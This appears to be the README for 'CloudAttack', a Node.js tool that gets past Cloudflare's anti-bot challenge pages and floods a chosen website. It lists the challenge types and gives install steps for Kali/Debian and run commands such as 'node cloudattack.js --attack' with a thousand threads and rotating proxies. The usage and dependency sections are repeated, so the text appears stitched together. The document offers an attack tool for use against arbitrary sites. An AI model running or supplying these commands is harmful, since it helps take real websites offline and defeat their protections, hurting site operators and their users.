In general, Cloudflare has 4 types of _common_ anti-bot pages:
- Simple html+javascript page with challenge
- Page which redirects to original site
- Page with recaptcha
- Page with error ( your ip was banned, etc)
Usage
============
```javascript
Install on Kali/Debian
cd CloudAttack-Master
chmod +x install.sh
./install.sh
Run: node cloudattack.js --attack "yoursite" --threads 500
Proxys: --proxy true --updateproxy true
Example: node cloudattack.js --attack "https://www.site.com" --threads 1000 --proxy true
```
## Dependencias:
- npm install
- npm install minimist
- npm install cloudscraper
- Simple html+javascript page with challenge
- Page which redirects to original site
- Page with recaptcha
- Page with error ( your ip was banned, etc)
Usage
============
```javascript
Install on Kali/Debian
cd CloudAttack-Master
chmod +x install.sh
./install.sh
Run: node cloudattack.js --attack "yoursite" --threads 500
Proxys: --proxy true --updateproxy true
Example: node cloudattack.js --attack "https://www.site.com" --threads 1000 --proxy true
```
## Dependencias:
- npm install
- npm install minimist
- npm install cloudscraper